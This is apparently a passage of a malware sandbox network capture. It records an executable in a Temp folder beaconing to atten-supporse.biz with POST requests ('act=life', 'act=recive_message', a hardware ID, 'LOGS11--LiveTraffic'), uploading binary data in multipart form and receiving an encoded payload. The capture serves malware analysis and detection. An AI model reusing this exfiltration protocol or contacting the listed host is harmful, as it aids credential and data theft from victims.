2024-12-09 23:42:12 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-09 23:42:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49850	104.21.80.1	443	5796	C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:43:34 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: atten-supporse.biz
2024-12-09 23:43:34 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-09 23:43:35 UTC	1020	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:43:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=l9lj3dq8418rlhi7uceq8u897o; expires=Fri, 04-Apr-2025 17:30:13 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S4We%2BiyzQH33dNbx4t7wU2xFXr9A8nYsDjAYBldDlunkk%2BEyyf6%2FBKG1j8qKsXA%2BPnT9UGosct5Y19InjnfUEGQ4eaTVVdcGoUhW%2FjBPzJCAq0VZ4zX4hVYFZMWlqYaPGiGCn08%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8dbb1bf598c9c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1946&min_rtt=1942&rtt_var=738&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1474003&cwnd=196&unsent_bytes=0&cid=eb45f7b3684e632c&ts=1048&x=0"
2024-12-09 23:43:35 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-09 23:43:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49859	104.21.80.1	443	5796	C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:43:36 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: atten-supporse.biz
2024-12-09 23:43:36 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-09 23:43:37 UTC	1021	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:43:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rkfn53557s23ic3djqkk7t1f5f; expires=Fri, 04-Apr-2025 17:30:16 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VuCqUUSOT5bXALxuihB2Q149Y5%2FfqbpQxvAzB6Ohqbq6xRknDO7%2FVSi%2B57ErRp%2B2MerxexWQUB5BV6Kk9E3CnJtVpq1sGb49Q%2BWZazMEh%2FkyDlsoAmBy2ocHFYX2M7wurX0cf8Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8dbbf5a3bc3f8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1467&min_rtt=1459&rtt_var=563&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=955&delivery_rate=1916010&cwnd=160&unsent_bytes=0&cid=12bb8617c67c6ecf&ts=723&x=0"
2024-12-09 23:43:37 UTC	348	IN	Data Raw: 34 39 31 63 0d 0a 54 7a 71 58 31 2f 50 34 59 43 47 51 56 30 53 6b 4c 4f 49 43 41 58 37 4e 4f 65 79 64 78 67 33 6d 79 69 4a 73 58 64 33 2b 73 66 73 30 47 4f 48 31 79 63 78 4d 41 2b 4d 79 5a 70 35 59 6b 48 64 6b 55 75 39 59 69 4c 2f 38 61 34 65 6d 55 51 6c 78 2f 34 6a 63 32 58 56 63 39 72 75 41 6e 55 77 44 39 53 39 6d 6e 6e 65 5a 49 47 51 51 37 77 50 4f 2b 4b 78 76 68 36 5a 41 44 54 61 79 6a 74 32 59 4a 31 62 77 76 35 61 62 42 45 44 38 4f 69 48 42 53 59 4e 6f 62 78 65 67 55 59 47 2f 36 69 2b 44 73 41 42 57 66 35 43 62 78 5a 6f 43 57 2b 53 38 30 59 56 4d 57 72 49 79 4b 6f 59 57 77 47 4e 6b 48 4b 46 66 69 50 61 75 5a 59 36 75 51 51 67 33 72 5a 66 58 6b 79 64 59 38 37 36 63 6b 68 42 4e 39 6a 30 71 78 30 4f 44 49 43 31 63 71 45 50 4f 70 2b 51 38 74 71 74 52 48 Data Ascii: 491cTzqX1/P4YCGQV0SkLOICAX7NOeydxg3myiJsXd3+sfs0GOH1ycxMA+MyZp5YkHdkUu9YiL/8a4emUQlx/4jc2XVc9ruAnUwD9S9mnneZIGQQ7wPO+Kxvh6ZADTayjt2YJ1bwv5abBED8OiHBSYNobxegUYG/6i+DsABWf5CbxZoCW+S80YVMWrIyKoYWwGNkHKFfiPauZY6uQQg3rZfXkydY876ckhBN9j0qx0ODIC1cqEPOp+Q8tqtRH
2024-12-09 23:43:37 UTC	1369	IN	Data Raw: 55 59 38 37 75 51 6c 77 4a 52 2b 6a 34 74 77 31 79 4c 61 57 34 52 72 31 61 45 38 4b 64 76 67 36 4a 4b 41 54 57 37 6b 64 36 66 4c 56 69 31 2b 39 47 64 47 67 4f 71 64 51 58 44 58 6f 64 73 64 56 36 56 47 35 47 78 76 53 2b 44 70 41 42 57 66 37 65 5a 30 4a 6f 6d 56 2f 61 39 6d 6f 67 43 55 66 51 34 49 39 52 49 68 57 35 70 48 37 31 52 67 50 6d 6e 5a 6f 2b 68 52 51 6b 37 2f 39 4b 54 6e 6a 55 59 72 66 57 77 6c 77 6c 50 2b 43 49 6d 68 6c 48 4f 65 53 4d 62 6f 78 76 57 76 36 42 75 67 4b 6c 45 41 44 47 37 6b 4e 57 58 49 46 66 7a 76 35 47 64 43 45 76 36 4e 43 76 4e 51 59 42 6c 62 68 69 70 56 34 2f 36 35 43 48 45 72 31 68 4f 5a 2f 2b 79 31 4a 6f 2f 47 73 43 32 6e 35 51 46 56 62 49 71 61 4e 38 4f 68 32 77 6a 52 4f 39 56 69 2f 43 32 62 70 61 74 54 68 77 7a 75 70 72 65 6d Data Ascii: UY87uQlwJR+j4tw1yLaW4Rr1aE8Kdvg6JKATW7kd6fLVi1+9GdGgOqdQXDXodsdV6VG5GxvS+DpABWf7eZ0JomV/a9mogCUfQ4I9RIhW5pH71RgPmnZo+hRQk7/9KTnjUYrfWwlwlP+CImhlHOeSMboxvWv6BugKlEADG7kNWXIFfzv5GdCEv6NCvNQYBlbhipV4/65CHEr1hOZ/+y1Jo/GsC2n5QFVbIqaN8Oh2wjRO9Vi/C2bpatThwzuprem
2024-12-09 23:43:37 UTC	1369	IN	Data Raw: 32 6e 35 51 46 56 62 49 71 61 4e 38 4f 68 32 77 6a 52 4f 39 57 68 76 71 68 59 49 57 69 54 67 73 31 73 35 54 64 6d 6a 39 58 38 62 57 64 6b 67 68 4f 2f 44 45 75 7a 30 57 4c 5a 6d 4d 64 70 52 76 41 76 36 4e 33 78 50 41 41 4f 6a 69 7a 6b 64 7a 62 47 46 76 37 75 35 61 4d 51 6c 79 38 4c 47 62 42 51 73 41 34 49 78 43 6d 57 34 58 31 6f 47 2b 44 70 55 55 4e 4f 4c 79 52 31 4a 4d 6a 58 2f 47 35 6d 4a 63 45 51 2f 55 78 49 39 52 4c 69 57 78 76 58 4f 45 62 69 65 66 6b 4e 38 53 48 52 78 67 38 6b 4a 2f 43 6b 47 31 48 75 36 7a 52 6e 51 34 44 71 6e 55 68 77 30 61 4c 5a 6d 73 63 76 56 36 41 39 4b 56 6c 67 71 6c 4e 41 6a 6d 2f 6e 64 4f 66 49 56 6a 79 73 6f 4f 49 42 30 58 67 50 32 61 49 44 6f 64 34 49 30 54 76 62 5a 37 6f 74 58 6e 47 6e 55 4d 41 4d 62 69 4b 6b 34 5a 6a 51 62 Data Ascii: 2n5QFVbIqaN8Oh2wjRO9WhvqhYIWiTgs1s5Tdmj9X8bWdkghO/DEuz0WLZmMdpRvAv6N3xPAAOjizkdzbGFv7u5aMQly8LGbBQsA4IxCmW4X1oG+DpUUNOLyR1JMjX/G5mJcEQ/UxI9RLiWxvXOEbiefkN8SHRxg8kJ/CkG1Hu6zRnQ4DqnUhw0aLZmscvV6A9KVlgqlNAjm/ndOfIVjysoOIB0XgP2aIDod4I0TvbZ7otXnGnUMAMbiKk4ZjQb
2024-12-09 23:43:37 UTC	1369	IN	Data Raw: 43 46 48 36 4f 79 76 4e 51 59 74 79 59 78 47 72 56 34 72 33 72 32 58 45 35 67 41 4a 4a 2f 2f 45 6b 36 77 67 56 2f 57 32 68 39 6f 64 44 65 74 31 49 63 6f 4f 32 43 42 76 45 71 39 55 67 76 4f 76 5a 34 57 6b 54 67 6b 36 74 70 54 62 69 79 78 63 2f 62 53 66 6c 51 4e 48 39 7a 41 69 77 55 71 47 62 79 4e 53 37 31 79 57 76 2f 77 76 71 34 39 31 54 42 36 46 33 4d 7a 58 4e 42 6a 79 75 64 48 43 51 6b 2f 78 4f 53 37 4a 53 49 6c 73 61 52 57 6b 56 34 58 37 71 47 61 42 72 6b 45 4c 4f 72 36 59 33 35 4d 72 57 2f 61 36 6e 70 55 4b 41 37 78 31 49 64 34 4f 32 43 42 47 43 36 52 56 69 4c 2b 37 49 5a 33 6f 52 77 4a 2f 35 39 7a 66 6b 43 74 65 38 4c 6d 51 6e 41 70 47 2b 6a 45 6e 77 45 69 44 62 32 63 5a 72 6c 53 4b 38 36 70 6c 68 61 6c 4d 42 54 43 30 6d 5a 50 58 62 56 2f 74 39 63 6e Data Ascii: CFH6OyvNQYtyYxGrV4r3r2XE5gAJJ//Ek6wgV/W2h9odDet1IcoO2CBvEq9UgvOvZ4WkTgk6tpTbiyxc/bSflQNH9zAiwUqGbyNS71yWv/wvq491TB6F3MzXNBjyudHCQk/xOS7JSIlsaRWkV4X7qGaBrkELOr6Y35MrW/a6npUKA7x1Id4O2CBGC6RViL+7IZ3oRwJ/59zfkCte8LmQnApG+jEnwEiDb2cZrlSK86plhalMBTC0mZPXbV/t9cn
2024-12-09 23:43:37 UTC	1369	IN	Data Raw: 6a 49 6a 7a 55 47 4d 49 43 31 63 71 45 50 4f 70 2b 52 42 6a 37 74 58 44 54 47 30 69 73 6a 5a 4d 68 62 73 39 5a 61 57 51 68 75 79 4e 69 33 4e 53 6f 42 73 59 78 69 69 57 35 7a 77 6f 32 69 4e 6f 31 49 45 4f 4c 69 58 32 35 49 69 58 75 65 35 6e 34 67 48 55 65 42 31 61 49 5a 4a 6d 43 41 37 58 4a 6c 63 6e 75 2b 6e 4c 62 57 2b 51 78 67 30 73 70 43 54 68 6d 4e 42 74 62 4b 64 32 6c 6f 44 39 44 6f 76 78 55 47 42 61 57 38 52 71 6c 4b 4c 2f 71 4a 72 6a 71 4a 41 43 44 6d 2b 6d 64 6d 61 4c 46 4c 38 73 70 6d 64 41 56 47 79 65 32 62 42 56 73 41 34 49 7a 57 6f 53 59 44 76 35 48 44 4b 73 51 41 4a 4d 2f 2f 45 6b 35 30 6e 56 2f 47 79 6e 5a 77 48 52 66 38 30 4b 63 64 4f 6a 32 52 6f 46 61 6c 61 67 2f 71 70 61 35 61 69 53 77 45 7a 74 70 44 65 32 57 4d 59 38 71 33 52 77 6b 4a 79 Data Ascii: jIjzUGMIC1cqEPOp+RBj7tXDTG0isjZMhbs9ZaWQhuyNi3NSoBsYxiiW5zwo2iNo1IEOLiX25IiXue5n4gHUeB1aIZJmCA7XJlcnu+nLbW+Qxg0spCThmNBtbKd2loD9DovxUGBaW8RqlKL/qJrjqJACDm+mdmaLFL8spmdAVGye2bBVsA4IzWoSYDv5HDKsQAJM//Ek50nV/GynZwHRf80KcdOj2RoFalag/qpa5aiSwEztpDe2WMY8q3RwkJy
2024-12-09 23:43:37 UTC	1369	IN	Data Raw: 74 45 6b 6d 70 6f 47 61 4a 57 67 2f 79 69 61 59 2b 6b 55 67 63 2f 76 4a 65 54 31 32 31 66 37 66 58 4a 32 69 46 55 35 44 38 68 79 6c 69 4c 59 57 41 4b 6f 6b 76 4f 73 65 52 2b 67 37 6b 41 56 69 6d 76 69 39 53 47 59 30 47 31 73 70 33 61 57 67 50 30 50 43 44 42 53 49 35 79 5a 68 71 67 56 49 66 32 6f 47 65 48 71 45 51 4b 4f 4c 71 66 33 35 49 71 57 2f 71 78 6d 4a 51 4c 54 4c 4a 37 5a 73 46 57 77 44 67 6a 50 62 52 59 67 76 4c 6b 63 4d 71 78 41 41 6b 7a 2f 38 53 54 6c 53 4e 64 39 62 2b 58 6e 67 64 46 2b 44 41 6d 7a 55 32 50 5a 47 55 59 6f 46 75 46 39 71 56 70 67 61 4a 4c 43 44 4b 38 6d 74 58 5a 59 78 6a 79 72 64 48 43 51 6d 50 70 4f 43 72 42 44 70 38 75 65 6c 79 6f 56 38 36 6e 35 47 53 49 72 45 63 4f 4d 72 79 55 31 70 30 6e 58 66 57 39 67 35 49 43 52 4f 41 6e 4a Data Ascii: tEkmpoGaJWg/yiaY+kUgc/vJeT121f7fXJ2iFU5D8hyliLYWAKokvOseR+g7kAVimvi9SGY0G1sp3aWgP0PCDBSI5yZhqgVIf2oGeHqEQKOLqf35IqW/qxmJQLTLJ7ZsFWwDgjPbRYgvLkcMqxAAkz/8STlSNd9b+XngdF+DAmzU2PZGUYoFuF9qVpgaJLCDK8mtXZYxjyrdHCQmPpOCrBDp8uelyoV86n5GSIrEcOMryU1p0nXfW9g5ICROAnJ
2024-12-09 23:43:37 UTC	1369	IN	Data Raw: 34 49 79 4c 76 53 59 33 76 70 32 43 56 6c 67 42 57 4a 6f 48 63 32 49 38 71 53 50 61 6a 6d 70 63 4f 55 73 78 31 66 70 49 63 30 6a 49 78 54 72 41 62 6b 63 44 71 4c 34 58 6f 47 44 63 6d 2f 34 71 54 77 58 38 57 74 61 66 52 77 6b 49 45 38 53 63 30 77 45 32 57 59 79 51 69 6b 58 79 59 39 61 4e 2f 67 37 39 50 54 6e 48 2f 6b 35 50 42 46 42 6a 38 73 6f 71 4c 46 45 37 69 4d 6d 62 35 41 4d 42 34 49 30 54 76 62 6f 33 78 71 6d 69 53 75 51 30 70 4b 62 57 62 77 35 34 36 56 37 58 37 30 5a 78 43 47 36 46 37 5a 73 4a 66 77 44 67 7a 54 76 51 4f 33 61 6a 30 50 5a 76 6d 57 55 34 70 2f 38 53 42 31 32 31 4b 74 65 33 52 33 51 46 52 34 44 4d 6c 30 45 33 48 58 6c 30 37 74 56 61 49 36 4c 56 52 75 71 39 61 41 7a 6d 6f 6a 5a 2b 4d 4c 6c 62 37 73 6f 66 61 54 41 50 39 64 58 37 2f 44 73 Data Ascii: 4IyLvSY3vp2CVlgBWJoHc2I8qSPajmpcOUsx1fpIc0jIxTrAbkcDqL4XoGDcm/4qTwX8WtafRwkIE8Sc0wE2WYyQikXyY9aN/g79PTnH/k5PBFBj8soqLFE7iMmb5AMB4I0Tvbo3xqmiSuQ0pKbWbw546V7X70ZxCG6F7ZsJfwDgzTvQO3aj0PZvmWU4p/8SB121Kte3R3QFR4DMl0E3HXl07tVaI6LVRuq9aAzmojZ+MLlb7sofaTAP9dX7/Ds
2024-12-09 23:43:37 UTC	1369	IN	Data Raw: 39 77 76 63 70 50 45 38 30 2f 67 53 45 58 47 6d 33 4d 58 5a 64 51 71 37 39 59 50 61 57 67 4f 31 4e 6a 54 55 53 49 4e 32 59 46 75 52 5a 61 6e 78 6f 32 36 53 75 46 63 42 41 59 47 4a 30 4a 63 6a 58 2b 4f 6b 30 64 52 43 54 4c 4a 74 48 34 59 47 77 46 38 74 58 4c 63 62 31 72 2b 52 62 49 71 6d 52 78 67 75 38 72 76 64 6e 69 78 4f 35 61 4b 65 32 6b 77 44 39 48 56 2b 6c 41 44 41 5a 48 4a 63 39 77 76 63 70 50 45 38 30 2f 67 53 45 58 47 6d 33 4d 58 5a 64 51 71 37 39 59 50 61 57 67 4f 31 4e 6a 54 55 53 49 4e 32 59 46 75 52 5a 61 6e 78 6f 32 36 53 75 46 63 42 63 4a 47 71 38 71 63 54 54 66 61 37 6e 35 30 55 55 72 4a 37 5a 73 6b 4f 32 46 6b 6a 56 4f 39 6b 77 4c 2b 38 4c 39 7a 6f 64 51 30 78 73 5a 76 46 69 47 42 2f 2b 37 4b 51 6a 42 4a 55 2f 58 6f 49 38 47 2f 41 4c 69 4d Data Ascii: 9wvcpPE80/gSEXGm3MXZdQq79YPaWgO1NjTUSIN2YFuRZanxo26SuFcBAYGJ0JcjX+Ok0dRCTLJtH4YGwF8tXLcb1r+RbIqmRxgu8rvdnixO5aKe2kwD9HV+lADAZHJc9wvcpPE80/gSEXGm3MXZdQq79YPaWgO1NjTUSIN2YFuRZanxo26SuFcBcJGq8qcTTfa7n50UUrJ7ZskO2FkjVO9kwL+8L9zodQ0xsZvFiGB/+7KQjBJU/XoI8G/ALiM
2024-12-09 23:43:37 UTC	1369	IN	Data Raw: 76 69 61 55 61 6d 36 52 78 34 38 2f 61 33 46 6d 69 31 57 38 76 58 66 32 68 6f 44 71 6e 55 4c 31 45 6d 51 59 79 4e 53 37 31 66 4f 70 2b 52 69 6c 71 39 51 44 58 4f 34 68 74 54 5a 4d 68 62 73 39 59 66 61 57 68 43 38 64 54 53 47 46 73 41 6e 62 52 47 75 57 49 44 38 74 6e 32 43 71 31 59 4e 65 49 47 69 2f 6f 73 71 53 50 62 33 6f 4a 63 47 56 65 63 32 4e 73 46 77 76 6b 31 78 47 37 39 59 7a 4e 4f 6a 59 6f 69 57 66 6a 6b 75 75 49 79 52 76 79 35 4f 39 76 58 66 32 68 6f 44 71 6e 55 4c 31 45 6d 51 59 79 45 77 71 46 61 43 76 37 73 68 6e 65 68 57 54 6d 66 73 30 70 4f 4c 62 51 43 31 38 70 4b 49 45 45 58 78 49 79 57 42 63 4c 35 4e 63 52 75 2f 57 4d 7a 4f 71 57 75 53 76 55 4d 65 4f 49 47 69 2f 6f 73 71 53 50 62 33 74 4b 42 41 63 75 51 32 4a 73 68 4a 77 43 34 6a 42 4f 38 44 Data Ascii: viaUam6Rx48/a3Fmi1W8vXf2hoDqnUL1EmQYyNS71fOp+Rilq9QDXO4htTZMhbs9YfaWhC8dTSGFsAnbRGuWID8tn2Cq1YNeIGi/osqSPb3oJcGVec2NsFwvk1xG79YzNOjYoiWfjkuuIyRvy5O9vXf2hoDqnUL1EmQYyEwqFaCv7shnehWTmfs0pOLbQC18pKIEEXxIyWBcL5NcRu/WMzOqWuSvUMeOIGi/osqSPb3tKBAcuQ2JshJwC4jBO8D

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49864	104.21.80.1	443	5796	C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:43:39 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=857YDCFIXSV User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18127 Host: atten-supporse.biz
2024-12-09 23:43:39 UTC	15331	OUT	Data Raw: 2d 2d 38 35 37 59 44 43 46 49 58 53 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 45 43 39 33 42 33 31 36 39 39 41 42 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 38 35 37 59 44 43 46 49 58 53 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 35 37 59 44 43 46 49 58 53 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 38 35 37 59 44 43 46 49 58 53 56 Data Ascii: --857YDCFIXSVContent-Disposition: form-data; name="hwid"8BEC93B31699AB4123D904AF30EFEBBC--857YDCFIXSVContent-Disposition: form-data; name="pid"2--857YDCFIXSVContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--857YDCFIXSV
2024-12-09 23:43:39 UTC	2796	OUT	Data Raw: bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d Data Ascii: 'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwm
2024-12-09 23:43:40 UTC	1030	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:43:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8e3apgcoe2njg769ugh1lp1asc; expires=Fri, 04-Apr-2025 17:30:18 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZxQYS9nrO8REEqCEDvqiYhlVUuyQ0YB1lnAD86J9g%2BzHWu9gvr2J%2B4f8%2Bi2EqPDXP8SIKP4hGNjBzMXv3IvDoYSPFlNFqJE%2FfaMw%2FpU9cif%2BJ%2FZDRIjkmZt8YuWMZZmXv4v%2Bmms%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8dbcddb43429d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1576&rtt_var=606&sent=11&recv=21&lost=0&retrans=0&sent_bytes=2847&recv_bytes=19084&delivery_rate=1784841&cwnd=246&unsent_bytes=0&cid=e69d9b6d5b01464b&ts=1040&x=0"
2024-12-09 23:43:40 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-09 23:43:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49869	104.21.80.1	443	5796	C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-09 23:43:41 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=4AAAAI4C5BC9K0K7Q User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8784 Host: atten-supporse.biz
2024-12-09 23:43:41 UTC	8784	OUT	Data Raw: 2d 2d 34 41 41 41 41 49 34 43 35 42 43 39 4b 30 4b 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 42 45 43 39 33 42 33 31 36 39 39 41 42 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 34 41 41 41 41 49 34 43 35 42 43 39 4b 30 4b 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 41 41 41 41 49 34 43 35 42 43 39 4b 30 4b 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 Data Ascii: --4AAAAI4C5BC9K0K7QContent-Disposition: form-data; name="hwid"8BEC93B31699AB4123D904AF30EFEBBC--4AAAAI4C5BC9K0K7QContent-Disposition: form-data; name="pid"2--4AAAAI4C5BC9K0K7QContent-Disposition: form-data; name="lid"LOGS11--LiveTraf
2024-12-09 23:43:42 UTC	1018	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:43:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=o4jgc4pq8ohaukto80fek26mu2; expires=Fri, 04-Apr-2025 17:30:21 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=foQ9ezbHLKUswZ3onhE96G%2BBykR5jnRL2lyg8SCaK86Ju8Dp99YKw9pyVIs8uzGQYnxQDZC29OIym3%2B%2BYcnIZkZXtjyh84surwfoGtOSs8uZ18GnrxA6jbUaDtz3bAxP9ey2hi4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ef8dbde4bbd7d05-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3885&min_rtt=1862&rtt_var=2094&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2846&recv_bytes=9724&delivery_rate=1568206&cwnd=195&unsent_bytes=0&cid=c267bdc3f9f30223&ts=943&x=0"
2024-12-09 23:43:42 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-12-09 23:43:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49877	104.21.80.1	443	5796	C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe

Timestamp	Bytes transferred	Direction	Data
